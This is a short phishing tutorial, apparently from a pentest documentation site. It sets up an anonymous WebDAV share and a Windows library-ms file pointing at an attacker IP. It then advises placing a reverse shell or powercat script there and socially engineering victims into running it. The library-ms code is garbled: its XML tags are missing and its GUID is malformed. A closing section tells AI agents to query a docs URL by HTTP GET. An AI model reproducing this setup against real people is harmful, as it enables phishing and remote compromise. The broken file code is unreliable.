# Windows Library Files Windows library files are virtual containers that can be accessed across networks by users. The files have a library-ms extension and can be executed by double-clicking them. First we have to create a Webdav share in our system that can be accessed through the library-ms file. Upon double clicking the library-ms file the share appears as a local directory to the user. First, wsgidav has to be installed on your local machine using the following command, ``` pip3 install wsgidav ``` Next, create a directory by the path "/home/kali/webdav" and this folder can contain any malicioius file that will be accessed by the victim. Now the wsgidav service can be started using the following command, ``` /home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/ ``` Next the library-ms file has to be created using the following code, ``` @windows.storage.dll,-34582 6 true imageres.dll,-1003 {7h483j726-3io1-4f05-98ta-fdc8fj92js856} true false http://192.168.3.7 ``` Now any file such as a reverse shell or powercat script can be placed in this location and the user can be convinced to run the file through an email or by employing any social engineering method. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.particle42.com/phishing/windows-library-files.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.